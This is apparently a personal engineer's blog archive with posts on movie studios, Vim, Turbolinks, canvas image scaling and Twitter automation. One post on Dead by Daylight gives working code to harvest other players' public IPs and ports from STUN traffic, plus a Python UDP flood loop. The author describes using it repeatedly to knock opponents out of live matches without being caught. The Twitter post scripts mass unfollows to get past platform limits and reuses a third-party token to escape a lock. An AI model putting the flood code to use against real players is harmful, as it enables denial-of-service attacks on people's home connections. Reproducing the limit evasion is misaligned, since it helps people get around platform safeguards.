Dan Bradbury

Ramblings, rants, and musings of an engineer

Mediocrity in Movies (Part 1)

I’ve been trying to make sense of the wave of mediocre movies, games, and music that has been dumped on us lately. This will be part 1 of a series of rants dedicated to mediocrity.

The Question

Why the hell are studios making these trash movies with famous actors and no substance?

Obviously good movies are going to make money; think defining films/classic movies (Dirty Harry, Fast Times at Ridgemont High, insert any movie that you’ll never forget here). But what happens when bad movies start to make money and become repeatable successes in the eyes of the studio execs? Whether you are making a modern classic or a pile of trash like Piranha 3D, it takes money to give the project life (and varying degrees of effort).

Since the studio is so powerful in the production of films, I want to take a look at a fairly young studio that caught my eye while watching the playoffs this weekend: CBS Films. For some reason I was unaware that the monster that is CBS had a movie studio that was actively producing films, and it took a stupid movie like Patriots Day to alert me to the fact. I was watching football on CBS and saw an ad for CBS Films; something smelled fishy, so I decided to do some wiki-researching.

Follow the money

CBS Films was founded in 2007 with the goal of producing 4-6 movies a year, each with a budget of around $50 million (big boss says you have a yearly budget of $300 million). If you want to read a more detailed year-by-year summary of the studio, the wiki#CompanyHistory does a good job. The TLDR; is they aren’t the best movie studio out there and are looking for help from others who have led successful ventures, like Lionsgate.

Before I get ahead of myself, it’s important to review history and understand that CBS tried out film production before with Cinema Center Films (1967-1972). They released films like With Six You Get Eggroll (this is 1968, so you best believe that is a derogatory reference to an Asian character who is in a single scene). They did hit a few winners with Snoopy, Come Home (people who love Peanuts do enjoy it) + others like Scrooge and Little Big Man w/ Dustin Hoffman. Check out the full filmography and see if you recognize any before they closed up shop.

Alright, now that we know that CBS has been interested in owning a studio for some time, we can start to understand why they are making such shitty films every year. I’m fully convinced that CBS is not in the business of making good movies but is in it to make profitable films, which tends to translate into the sub-par movies they continuously release. For a studio like this with multiple TV networks, marketing seems like a sure-fire way to get people to pay up for tickets. This is apparent to anyone who had to watch TV while they were advertising Patriots Day. If this movie makes money it will be an instant success and the studio will look to repeat the trick with another close-to-home act of terror.

Even a broken clock is right 2 times a day.

In the case of film studios they will occasionally put out a good movie (not because that’s what they set out to do but by being in the right place at the right time + having the funds to let a talented director make a film). So let’s take a look at the full list of movies they’ve made over the past 9 years:

Release Date Title Budget Gross (worldwide)
Jan 22, 2010 Extraordinary Measures $30 million $15.1 million
April 23, 2010 The Back-up Plan $35 million $77.5 million
November 24, 2010 Faster $24 million $35.5 million
January 28, 2011 The Mechanic $40 million $51 million
March 4, 2011 Beastly $17 million $28.8 million
February 3, 2012 The Woman in Black $13 million $127.7 million
March 9, 2012 Salmon Fishing in the Yemen $14.5 million $34.6 million
September 7, 2012 The Words $6 million $13.2 million
October 12, 2012 Seven Psychopaths $15 million $23.5 million
March 1, 2013 The Last Exorcism Part II $5 million $15.2 million
May 31, 2013 The Kings of Summer unknown $1.3 million
July 26, 2013 The To Do List $1.5 million $3.9 million
November 1, 2013 Last Vegas $28 million $134.4 million
December 6, 2013 Inside Llewyn Davis $11 million $13 million
April 4, 2014 Afflicted $318,000 $121,200
April 25, 2014 Gambit unknown $14.2 million
August 15, 2014 What If $11 million $7.8 million
September 26, 2014 Pride unknown $16.7 million
February 20, 2015 The Duff $8.5 million $43.5 million
November 13, 2015 Love the Coopers $24 million $41.1 million
March 25, 2016 Get a Job unknown unknown
April 12, 2016 Flight 7500 unknown $2.8 million
August 12, 2016 Hell or High Water $12 million $31 million
October 7, 2016 Middle School: The Worst Years of My Life $8.5 million $20.7 million
December 21, 2016 Patriots Day $45 million We shall see

16/24 movies being profitable seems like they have hit their mark, but the rest were either flops or the studio decided not to release how much the movie cost to make. I assume this is because they spent so much and the movie did so poorly; take a look at Flight 7500, a sci-fi/horror movie with Amy Smart that was barely passable and only made $2.8 million. It was planned for release in 2013 but was pulled and later turned into an on-demand release in 2016. The studio won’t say how much they spent on the film, which makes me believe they spent a pretty penny to make a pile of shit. Luckily for CBS Films, any flop that they haven’t over-marketed can be turned into a release on Showtime or one of their other movie networks.

pile of trash that CBS fumbled with for 4 years before dumping to on-demand

The most profitable film for the studio was The Woman in Black, which had Daniel Radcliffe in it, so every Harry Potter fanboy who could stand a horror film ran to see it around the world. For anyone who saw the movie, it wasn’t anything amazing but definitely not a bad movie. A beefy marketing campaign focused on showing Radcliffe’s face in as many places as possible helped push a mediocre film into a money-making machine for the studio.

After that success the studio remained focused on having recognizable actors in lead roles for the majority of films they were willing to put their money behind (with the exception of a few failed experiments). For the most part the formula makes money, and they continue to make movies with a deep investment in the stars they hire + marketing campaigns to make sure everyone knows Actor X and Y are in Movie ZZZZZZ and the trailer looks good. This exact formula is the rationale for making a movie like Patriots Day; it ticks all the boxes: human interest, a very recognizable actor, and it’s easy to market. So I guess this makes sense for a studio that’s all about the money.

My hope is that this movie is a complete flop and the studio eventually caves like its predecessor Cinema Center Films. I know it’s unrealistic to hope for a future where money doesn’t control what gets made, but I’m optimistic that as consumers we can start sending clear messages that we are tired of this shit storm. I’m hopeful we can get more movies like Fast Times at Ridgemont High that are truly excellent at what they are trying to do. Otherwise we should brace ourselves for the onslaught of mediocrity and be ready for more iterations of Final Destination and whatever marketers know will sell to the general population.

Exploiting P2P Game Hosting in Dead by Daylight

Any gamer will tell you dedicated servers are preferred over someone being selected as the host and having an unfair advantage with much better latency. P2P online gaming is just awful for anyone who wants a truly competitive environment; clients must maintain a connection with the host, and if the host leaves does the game end? Is there a graceful transfer? (who knows until it happens). On top of that, bullshit like the following POC is too damn easy to pull off for anyone who has basic Python abilities.

If you haven’t heard about DbD I’d actually highly recommend the game + give props to the creators for making a fun and original multi-player survival horror game (Steam link). The basic idea of the game is that 4 players are Survivors, responsible for repairing generators and escaping from the grasp of the Killer (another player whose goal is to hunt and kill as many Survivors as they can before they all run to safety). Simple idea but really enjoyable if you can get a group of friends and try to survive together / enjoy messing with folks as a killer.

Since the game was made by a very small team there was a wave of complaints and issues in the early days. As more and more networking issues were being reported (and experienced firsthand) I had to pop open Wireshark and see what was going on.

I joined a game and waited for the load screen to start the Wireshark capture. As soon as the game started you could see the flood of UDP packets + our trusty friend STUN (in this case CLASSIC-STUN, but the ideas are the same) and I knew we’d be able to have a little fun.

For those of you who might not be familiar with the STUN protocol here’s a quick review:

Session Traversal Utilities for NAT (STUN) is a protocol that serves as a tool for other protocols in dealing with Network Address Translator (NAT) traversal. It can be used by an endpoint to determine the IP address and port allocated to it by a NAT. It can also be used to check connectivity between two endpoints, and as a keep-alive protocol to maintain NAT bindings.

Who is sending / receiving these packets?

STUN Client: A STUN client is an entity that sends STUN requests and receives STUN responses. A STUN client can also send indications. In this specification, the terms STUN client and client are synonymous.

What info do we care about in the packet?

MAPPED-ADDRESS:
  - Protocol Family: IPv4
  - IP: 192.168.0.1
  - Port: 53199

That’s all you need to know to follow along, but if you are interested in knowing more about STUN check out RFC 5389.

Each player is acting as a client and is handling both requests and responses to maintain a connection to the other players in the game. If we listen to the traffic we have access to a public IP and port that is open for communication (to confirm, just watch the UDP packets flowing either way).
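Pulling the MAPPED-ADDRESS out of a captured Binding Response is only a handful of bytes of parsing. Here’s a rough sketch in JavaScript (not the exact script I ran); it assumes you’ve exported the raw CLASSIC-STUN payload from something like Wireshark into a Buffer:

// Parse MAPPED-ADDRESS (IP + port) out of a STUN Binding Response payload.
// Layout per RFC 3489/5389: 20-byte header, then type/length/value attributes.
function parseMappedAddress(buf) {
  if (buf.readUInt16BE(0) !== 0x0101) return null;     // not a Binding Response
  let offset = 20;                                      // skip the STUN header
  while (offset + 4 <= buf.length) {
    const type = buf.readUInt16BE(offset);
    const len = buf.readUInt16BE(offset + 2);
    if (type === 0x0001) {                              // MAPPED-ADDRESS
      const port = buf.readUInt16BE(offset + 6);
      const ip = [...buf.slice(offset + 8, offset + 12)].join('.');
      return { ip: ip, port: port };                    // the player's public endpoint
    }
    offset += 4 + ((len + 3) & ~3);                     // attributes are padded to 4 bytes
  }
  return null;
}

Run every STUN payload you capture through that and the victim list builds itself.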

Imagine a simple script that listens for those STUN headers, builds a list of victims, and runs a simple UDP flood:

import os
import socket

# 1 KB of random garbage to throw at the victim
payload = os.urandom(1024)
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

victim = input('Target >')
vport = int(input('Port >'))

packets_sent = 0
while True:
    client.sendto(payload, (victim, vport))
    packets_sent += 1
    if packets_sent % 100 == 0:
        print('.', end=' ', flush=True)

and the victim is pwnd.. 🎉

In the case of DbD the victim is flooded out of the game and points are given to the killer.

As the killer (hosting the game) you can target players with a simple test flood (watch them skip and shut it off before they are out of the game) and then D/C them if they are near escaping (giving the player 0 points and rewarding the killer for a successful kill).

As a survivor you can periodically flood the killer when he is chasing you to make sure he can’t hit you while you juke / escape his grasp (why not flood and wiggle at the same time?), or you can lag out your fellow survivors to pick up a particularly nice item they are running that game (too funny to lag out a friend who is bragging about some sick item he is going to run this game).

The main point I’m trying to make is that this is a dead-simple attack that can be pulled off by any jobber with minimal skill.

In my testing, a simple UDP flood like the one shown above using the STUN response results was 100% effective no matter when the flood was run (the port remained open for the entirety of the game and then some..). I ran tests for hours at a time and spaced them out over months of gameplay to see if EAC was ever going to pick up on this obvious attack… they never did. In fact EasyAntiCheat will not detect attacks like this (tested in other games they “secure”) + is generally shit given what they promise.

TLDR; Networking is difficult and gets messed up often. If something feels poorly implemented, chances are it is and there could be some fun to be had understanding what’s going on under the covers.

Unnecessary Noise in the Programming Community

Growing up on the internet I’ve always been aware of the trolling and general BM associated with competitive gaming and message boards. Unfortunately I’ve been noticing similar behavior in more and more projects & programming community sites. It seems too common to run into an SO post with a comment section like this

The example code is a bit tricky to digest on first pass + is written in bad vimL (see his answer + my correction if interested). Even if the question was dumb and pointless there is no reason to be a dick about it. It just creates unnecessary noise that does nothing but detract from the goal at hand. We should look to previous failures like rubyspec and try not to bring whatever shit is going on in our lives into the project. If you really need to blow off steam none of us mind if you go play some Overwatch and chill out a little bit before working on the next issue.

For those of you who didn’t follow along at home with the drama around rubyspec, here are a few links + a running repo of github drama links - HN on MRI and RubySpec issues - Some #rubinius BM - github-drama

Rule 97: Don’t be a dick

Turbolinks and Anchors

So far my journey with turbolinks hasn’t been too bad; I write my slop and things work as I’d expect them to. I knew this streak of good luck was bound to come to an end at some point and today is the day.

I had the misfortune of attempting to implement simple anchor tags. At first I thought I had made a typo, but upon checking my code everything was fine. Another test and I noticed the damned .turbolinks-progress-bar appearing on click. It was clear turbolinks had mistaken my anchor link for a normal link and was intercepting the click like it would with other links. Things got strange when adding data-no-turbolinks yielded the same results..

After googling I found a closed issue that had apparently been resolved. Checked my turbolinks version and we’ve got the latest and greatest. A hastily closed issue back in 2014 leads us to the same problem in the present day. There’s a bit of discussion on the issue but it doesn’t look like anyone has offered a PR to resolve it :(

There are a few snippets to override the default behavior that could prove useful, but this is something that I’d expect turbolinks to have ironed out.

Because I don’t mind writing an onclick for the links I’ll probably implement something like this for a similar effect:

$('html, body').animate({scrollTop: $('#anchor').offset().top}, 'slow')
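Wiring that up for every in-page anchor link could look something like this (a sketch; assumes jQuery and that the anchor links all use hash hrefs like <a href="#anchor">):

// Smooth-scroll for hash links instead of letting the click be intercepted.
$(document).on('click', 'a[href^="#"]', function(e) {
  var target = $(this.hash);
  if (target.length) {
    e.preventDefault();
    $('html, body').animate({ scrollTop: target.offset().top }, 'slow');
  }
});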

I’m definitely disappointed in turbolinks for failing me in this instance but will continue on this less-travelled mysterious path DHH wants me to believe in.

Vim Tricks - Googling With Keywordprg

Most vim users are familiar with the man page lookup; K on the word under the cursor or on a visual selection. For anyone who needs a quick refresher, let’s take a look at the help docs (:help K)

          *K*
K     Run a program to lookup the keyword under the
  cursor.  The name of the program is given with the
  'keywordprg' (kp) option (default is "man").  The
  keyword is formed of letters, numbers and the
  characters in 'iskeyword'.  The keyword under or
  right of the cursor is used.  The same can be done
  with the command
    :!{program} {keyword}

So we can see that the lookup program (keywordprg / kp) defaults to “man” and the keyword is determined by what is right under the cursor when it is used. The other important thing to note is that we could invoke man or whatever program we want using :!{program} {keyword}, but that’s not as fun as reconfiguring the default behavior to do what we want.

Let’s imagine that for some reason we find ourselves copying sections of text and googling them. Rather than doing this over and over, why not just change keywordprg to a custom bash script that does what we want. First things first, let’s write a simple bash script to open up the browser (I assume every OS has some way to open a browser with a given URL; this is written on an Ubuntu machine, but if I were on a Mac I’d use open and test / google to make sure the syntax works as expected)

#!/bin/bash
firefox "https://www.google.com/search?q=$1"

Give it a handy name like googleShit, move it into your PATH, and pop open that ~/.vimrc to change your default keywordprg

set keywordprg=googleShit

And now when you use K inside a new vim session you will be googling the contents rather than looking up the man pages! If you find yourself repeating a task on the word under the cursor or on a visual selection, this is a pretty handy trick to have in the utility belt. Use a little imagination and you can come up with something to improve your daily workflow.

Different Browsers Are the Worst

While working on a personal project I ran into an issue with a bootstrap navbar collapse. In my local testing everything went fine, so I pushed and hoped everything would behave properly.. I grabbed my iPhone 5 and took a look only to see that the dropdown was not working at all.

After doing some googling I came across a SO post that accurately described the shitty situation I found myself in (the dropdown working in all browsers (including IE) and failing on all iOS devices)

The guy was apparently using an <a> tag without the href attribute, which would fail to trigger the collapsible menu. That’s all fine and good, but I’m trying to use a span and am too lazy to wrap my one line in a tag, so I hunt for a better solution..

My original (almost functional) trigger looks like this

<span class="glyphicon glyphicon-menu-hamburger navbar-toggle" style="color:white;" data-toggle="collapse" data-target=".navbar-collapse"></span>

Can you spot what’s missing with this simple data-toggle? It turns out you need to add cursor: pointer to the style of whatever the element might be..

If the majority of people are using links and buttons to trigger collapsible content then everything will work as expected and no problems will be had. For people who do what they want, there’s shit like this to deal with.

And that’s the web for you. Use some CSS/JS library like Bootstrap in hopes of saving yourself time and then tackle random shit like this. For the novice I’d imagine this would be an aggravating roadblock that would halt all progress for a few solid hours until they give up and use a button or link to accomplish the same thing as adding the cursor: pointer styling.

If you want to do work with web applications enjoy things like this because this is what we deal with on the daily.

Into the Abyss With Turbolinks

Previous attempts to adopt turbolinks during upgrades or new projects led me to the conclusion that I have a burning hatred for everything the project stands for (rage hatred is the worst kind..). From conversations with other Rails folks + former CTOs it seemed like turbolinks was something I could avoid without batting an eyelash (see comparisons to Windows 8 decision making or just ask a local Rails expert what their experience with turbolinks has been like)

As someone who previously ignored the efforts being made by DHH and the core team I would just start a new project with --skip-turbolinks to ensure my own sanity and continue with the hammering.

Since I’m a bit late to this conversation it’s nice to read posts like Yehuda Katz’ problem with turbolinks and 3 reasons why I shouldn’t use Turbolinks to get my hopes and dreams crushed.. Here is just the beginning of the headache that one can look forward to if they are to continue down through the thorns

Duplicate Bound Events

Because JavaScript is not reloaded, events are not unbound when the body is replaced. So, if you’re using generic selectors to bind events, and you’re binding those events on every Turbolinks page load. [This] often leads to undesirable behavior.

Alright, so to be honest this isn’t that bad. People can bitch about global state all they want, but as someone who enjoys thinking in a “game loop” I don’t mind this and feel like I can easily write my own code to these standards; something like the sketch below.
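For example, namespacing the handler and unbinding before rebinding keeps the binding idempotent no matter how many times the body gets swapped (a rough sketch; the selector is made up, and depending on your Turbolinks version the load event is page:load or turbolinks:load):

// Rebind on every Turbolinks visit without stacking duplicate handlers.
$(document).on('turbolinks:load', function() {
  $('#searchForm')
    .off('submit.search')               // drop any handler bound on a previous visit
    .on('submit.search', function(e) {
      e.preventDefault();
      console.log('searching for', $(this).find('input').val());
    });
});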

Audit Third-Party code

You audit all third-party code that you use to make sure that they do not rely on DOM Ready events, or if they do, that they DOM Ready events are idempotent.

And this is where it starts to get fun.. I just stumbled upon a bug that reared its head because of these two issues and I wanted to post a solution that I may find myself using more moving forward..

Imagine we are using typeahead.js and want to go ahead and initialize our typeahead input on a given page. Here’s what the JS might look like

  $('#searchBar .typeahead').typeahead({
    hint: true,
    highlight: true,
    minLength: 2
  },
  {
    name: 'estados',
    source: matcher(items)
  });

A pretty harmless call that you are probably going to copy-paste in to try the first time you mess with typeahead.js. It works and you move on.. But be careful, because turbolinks will give you some interesting behaviour if we navigate between the page that has this piece of JS and another page.

Turbolinks will invoke this each time the page is “loaded”. Because of this we will spawn a new instance of the typeahead input and the associated hint div.. For some reason (one I don’t care to look into) typeahead.js will spawn a new instance and hide the others rather than truly cleaning up. Either way we are left to fend for ourselves in the wilds of turbolinks, so we search for a solution.

I figure we can just handle global state a little better than your typical inline JS would. To do this we simply wrap the initializer in a conditional to verify the number of typeahead divs that are present on the screen. With proper naming we should be able to expand this approach to multiple typeahead instances.

  if($('.typeahead.tt-input').length < 1) {
    $('#searchBar .typeahead').typeahead({
      ...
    });
  }

With that extra check we are able to handle the global state that turbolinks will create when naturally navigating and attempting to speed up our page.
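Another option (an untested sketch on my part) is to tear the widget down before Turbolinks swaps the body rather than guarding the initializer; typeahead.js exposes a destroy method for exactly this, and the event name depends on your Turbolinks version (page:before-change on classic, turbolinks:before-cache on Turbolinks 5):

// Destroy the typeahead before Turbolinks stashes/replaces the page so the
// next visit starts from a clean input.
$(document).on('turbolinks:before-cache', function() {
  $('#searchBar .typeahead').typeahead('destroy');
});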

A recent webcast featuring DHH got me thinking about how simple the problem of a web application really is. The server demands are not a problem whatsoever (30ms response times are all you need to be perfect; anything lower is not truly noticeable or necessary). We have an issue when it comes to how the rest of the “page-load” occurs for the user.

We all know the “hard refresh” links, the ones that clearly jump you to a new page with new content. Loading a new page is the same old same old that we’ve been doing since we could serve shit up. Of course the new way is the “one page app” that allows the user to navigate without ever having to disengage from the page they were on. IMO the trend is getting a bit insane (I’ve always felt the JS community was a bit heavy-handed with trying new things..) and trying to keep up with the latest quarrels and trends is tiring. Where is the solution to the seamless application?

It’s clear that some will say Ember or React are the way forward to building beautiful apps that will take over the world, but I’m not sure I believe a JS framework is what will carry an application. So why learn all that unnecessary complexity when HTML5 is here?

If Turbolinks lives up to the intro of the README I will be a happy Rails camper.

Turbolinks makes navigating your web application faster. Get the performance benefits of a single-page application without the added complexity of a client-side JavaScript framework. Use HTML to render your views on the server side and link to pages as usual. When you follow a link, Turbolinks automatically fetches the page, swaps in its <body>, and merges its <head>, all without incurring the cost of a full page load.

C’mon Turbolinks don’t let me down again..

Development Turntable

And the turntable keeps on turnin’ and turnin’ Nothing can fuck with the way it goes around - Slug

Human nature tells us that there is a natural desire to make sense of the uncertain and create some semblance of control in our lives. This fundamental desire to create order where chaos thrives is the entire struggle of every growing company, and the realization always occurs when a company begins to grow past its infancy/adolescence. You know a company is in this phase when the Operations side wants to throw X engineers at the problem in hopes that it will increase efficiency and get us to that cash cow ASAP (a different can of worms for another time)

When I was introduced to SCRUM in the real world I was blown away by the organization that seemed to be instilled throughout a company of ~20 engineers (the largest team I had worked with at the time) and >100 in all departments. Communication seemed to be streamlined and the pace of development seemed like it was pushing limits and allowing the team to move at maximum velocity.. As a disclaimer, I still am a believer in some system like SCRUM (loose-SCRUM) to keep visibility in a minimal way, but I’d like to rethink the “optimal development cycle”

Whenever I think about business I am a bit cynical after seeing a company be sold with very little transparency to the <10 employees in the ranks. Because of past experiences with companies and individuals who have reneged on contracts and payments I like to assume the worst case when thinking in the hypothetical.

Let’s imagine a company that has just gone through a big round of funding and is now ready to make the push from 150 employees to 300+ w/ multiple offices around the United States to house all the talent that they have. This company is going places and they are in control of their destiny. The development team is churning out features left and right and the folks in Operations and Sales are able to keep customers happy and sign new customers with ease. In our fictitious company we have happy employees in every aspect of the business.

Now what happens when a Sales manager gets word that the company can sign the biggest contract ever, bigger by orders of magnitude that make…

To be continued..

Scaling Images With HTML5 Canvas

Had intended to post this 8 months ago but it got lost in the sea of gists..

This is old news by now for most, but I had quite a bit of fun implementing it for myself and figured I’d share my code and some learnings that came along with it. The basic idea is to use canvas to render an uploaded image and then utilize the toDataURL method on canvas to retrieve a Base64-encoded version of the image. In the example included here we will just direct-link to the newly scaled image, but you could imagine that we kick off an ajax request and actually process the image (in PHP base64_decode FTW). Without any more tangential delay let’s take a look at the code.

<input type="file" accept="image/*" id="imageFile" />
<table>
  <tr>
    <td>Width: <input type="text" id="width" value="200" style="width:30px; margin-left: 20px;" /></td>
  </tr>
  <tr>
    <td>Height: <input type="text" id="height" value="200" style="width:30px; margin-left: 20px;" /></td>
  </tr>
</table>
<canvas id="canvas" style="border: 1px solid black;" width="200" height="200"></canvas>
<button width="30" id="saveImage">Save Image</button>

The above HTML shouldn’t need any explanation but if it does feel free to open the attached JSFiddle to get a feel for it..

(function(){
  var currentImage,
      canvas = document.getElementById("canvas");

  document.getElementById("imageFile").addEventListener("change", fileChanged, false);
  document.getElementById("width").addEventListener("keyup", sizeChanged, false);
  document.getElementById("height").addEventListener("keyup", sizeChanged, false);
  document.getElementById("saveImage").addEventListener("click", share, false);

  // The inputs are id'd "width"/"height" so they map straight onto the
  // canvas properties we want to resize.
  function sizeChanged() {
    canvas[this.id] = this.value;
    if (currentImage) { renderImage(); }
  }

  function fileChanged() {
    var file = this.files[0],
        imageType = /^image\//;

    if (!imageType.test(file.type)) {
      console.error("not an image yo!");
      return;
    }

    var reader = new FileReader();
    reader.onload = function(e) {
      currentImage = e.target.result;   // Base64 data URL of the uploaded file
      renderImage();
    };
    reader.readAsDataURL(file);
  }

  function renderImage() {
    var image = document.createElement("img");
    // Attach onload before setting src so we never miss the event.
    image.onload = function() {
      var context = canvas.getContext("2d");
      context.drawImage(this, 0, 0, canvas.width, canvas.height);
    };
    image.src = currentImage;
  }

  function share() {
    // Direct-link to the scaled image (a Base64 data URL).
    document.location = canvas.toDataURL();
  }
}());

In order to bring the HTML to life we need to attach a few event handlers and define some basic functionality. The first thing to tackle is the actual file upload.

The File API has been part of the DOM since HTML5 and is used here to open the uploaded file from <input type="file"> on the "change" event. Inside of the change event there are 2 things that we want to do: (1) confirm the file type, and (2) render the file onto the canvas. To confirm the file type we can use the MIME type given to us by file.type and do a simple regex test (/^image\//) before attempting to render the unknown file (even though we’ve added accept="image/*" inside the input, that can be easily modified to attempt to upload any file). Once we are convinced that the user has uploaded an image it’s time to read the file and send it off to the canvas to render. FileReader’s readAsDataURL will allow us to process the file asynchronously and provides an onload callback that gives us the ability to set the newly read image and ask the canvas to draw.
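If you do want to process the image server side instead of direct-linking to it, the share step could kick off the ajax request mentioned above with the Base64 data (a sketch; the /upload endpoint and the use of jQuery are assumptions on my part):

// Hypothetical upload: POST the scaled canvas as a Base64 data URL.
// Server side you'd strip the "data:image/jpeg;base64," prefix and base64_decode the rest.
function share() {
  $.post('/upload', { image: canvas.toDataURL('image/jpeg', 0.8) })
   .done(function() { console.log('uploaded scaled image'); });
}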

Additional Reading

Playing the Twitter-game

I am not a marketer, nor do I have any real prior experience managing PR/social media for a company of any size. This is just a write-up of some of my learnings while out in the wild.

By all accounts I am a Twitter novice; I joined a few years ago but don’t really keep up with it (rage-tweet a politician or media personality from time to time but not much more). From other business ventures I’ve learned that having a strong presence on Twitter + Facebook can be a great way to drive traffic to your site and keep folks in the loop, but I had never invested any time in growing the profiles (outside of word of mouth and the usual social links in the footer of a site). For my most recent project I decided to take an active role in the growth of my Twitter account and to attempt to use a few of these automation tools / APIs to make my life a little easier.

I started the journey by trying out a product called ManageFlitter.com; I went all in and decided to buy the smallest plan they offered to maximize my “strategic follows”. After about 2 days of bulk requesting it became obvious that the “snazzy dashboard” views were nothing more than a facade.. I was hitting rate limits and unable to process a single follow / request with the access grant I had enabled for the site.

At this point I started angrily emailing support to figure out why I was being blocked without hitting any of the actual API / request limits listed in the Twitter guidelines. Here is the initial diagnosis I received (steps to fix are omitted since they were useless..)

Thank you for writing into ManageFlitter support on this. Unfortunately Twitter seems to have revoked some 3rd party app tokens over the last few weeks. This causes “invalid or expired token” in the notifications page and keeps your account from being able to process actions, post tweets into Twitter, or from allowing your ManageFlitter account to properly sync with Twitter.

Hmm so at this point I was frustrated because there is no way my token should have been revoked! Obviously they were using keys so that they could make these “analytic queries” on the twitter user base and had messed something up on their end that had made it impossible to proceed. I pressed along that line of thinking and received the following “helpful” response.

I am sorry to hear this. There seem to be a small group of Twitter users currently having this issue with ManageFlitter and some have noted that once their account is revoked, it is far easier for their account to continue to be revoked afterwards.

Some users have suggested that waiting 24 hours helps reset the account. Others have noted that the amount of actions they perform in sequence also matters greatly to avoid the revoked access. Some have noted that after they perform 100 clicks, if they wait 20-30 seconds (usually enough time to go to the Notifications page and see if Twitter is revoking access), then continuing to perform more clicks.

There is no particular reason why some accounts are being affected and other are not. We have been in touch with Twitter and unfortunately Twitter haven’t offered much in the way of remedy for us or our users.

TLDR; I was told to wait for the problem to fix itself..

This threw a massive wrench in my plans to bulk-follow people inside the industry and hope that some percentage of them would follow me back. After a few more angry emails I was told to just wait it out.. At that moment I pulled out the classic “I will have to proceed with a claim to PayPal / the Better Business Bureau” argument to get my money back and move on to another option.

After getting my money back I decided to ride the free train with Tweepi which had no problems for the first week of usage so I decided to buy a month of the lowest tier to use some of the analytics / follow tools that were being offered. With 2 weeks on the platform I can say that I’m very happy with what I paid for and will continue to use it in the future (until my follower count levels out a bit)

So why am I writing this article if I am just using a service to accomplish the task for me? While Tweepi does a lot for me it still imposes artificial limits on follow / unfollow in a 24 hour period. (see pic below)

You can see that the service has some limitations, the main one being that I can follow more people than I can unfollow in a given day. While that makes sense with Twitter’s policies, my goal is a raw numbers game where I’d like to follow as many people as possible in hopes they follow me back. Whether they follow me back or not I am content to unfollow and continue with my following numbers game.

Through this process I was able to drive my followed count up quite a bit (considering my actual follower count)

but still had this problem of the unbalanced follow:follower ratio that I wanted to correct. If I was active on Tweepi there was no way for me to drive this down without completely stopping following people for a period while I unfollowed the max every day.

So today I decided to have a little fun inside the browser and see what I could do. :grin:

Since twitter has a web + mobile application I could obviously sit and click through each of the people I was following to reduce the number but..

So let’s see how well formatted the Twitter following page is (and since it’s Twitter we know it’s going to be well organized). When arriving at the page we see the trusty un/follow button for each of the accounts we follow

we also notice that Twitter has some infinite-scroll magic going on to continuously load the 1000s of people we follow. With that knowledge in our hands it’s time to craft some jQuery-flavored code to do the clicking for us

// Click every un/follow button currently loaded on the page
$('.user-actions-follow-button').each(function() {
  $(this).click();
});

Pretty easy to click through each of the buttons on the page, but that’s only going to account for the ones we have manually scrolled through.. Not sufficient since we follow >4000 people but have <20 buttons on the page. So let’s handle that damned auto-scrolling

// Keep scrolling to the bottom so Twitter loads more of the list;
// the timeout gives each batch of results time to load.
var count = 0;
function st(){
  $("html, body").animate({ scrollTop: $(document).height() }, "fast");
  if(count < 2000) {
    count += 1;
    setTimeout(st, 500);
  }
}
st();

You might be thinking: why not just for-loop this shit?! The scroll animation needs a bit of time to allow for the page load; if you call it too fast the entire page will bug out and the “click button” code won’t work as expected. So we just use setTimeout and let that sucker run (good time to take a stretch or make some coffee). When you come back you should hopefully be at the bottom of the screen (wait for GridTimeline-footer to show up and you know you are done) :D
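If you’d rather not guess at an iteration count, a variation (untested sketch; the selector is just the class name mentioned above) is to keep scrolling until that footer element actually shows up:

// Scroll until the GridTimeline-footer appears instead of counting to 2000.
function scrollToEnd() {
  $("html, body").animate({ scrollTop: $(document).height() }, "fast");
  if ($('.GridTimeline-footer').is(':visible')) {
    console.log('reached the bottom, time to run the click code');
  } else {
    setTimeout(scrollToEnd, 500);
  }
}
scrollToEnd();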

Run the click code and patiently wait for your browser to slow down drastically and eventually unfollow your entire list. The result should look something like this

The 1 follower there threw me off since when I clicked on the link for my followers there wasn’t anyone listed. At this point I was suspicious that I may have set off one of the limits that would have deactivated my account. I checked my email and didn’t see any warnings or notifications from Twitter but did start seeing this whenever I tried to follow someone on their website. (Learn more here)

At this point I was thinking I just fucked myself and got my account banned or locked in some way. During this time of panic I decided to refresh my browser and saw some funky behavior on my profile page….

No “Following” count at all?! And I can’t follow anyone because of some unknown policy breach..

After writing a short sob story to Twitter about how I had “accidentally unfollowed everyone” (cover my ass) I thought about the locking problem a bit more.. Hmmm, what about that Tweepi token I was using before? Who would have guessed that it would work and allow me to follow people again!

So with a little bit of crafted JavaScript I was able to drop that Following count down without having to fight any artificial limits imposed on me by some third party. I’m incredibly happy with the results (as I am not banned and my account is working as expected) and plan to reproduce this with another client in the future.

It’s always a good feeling when adding a new tool to the utility belt.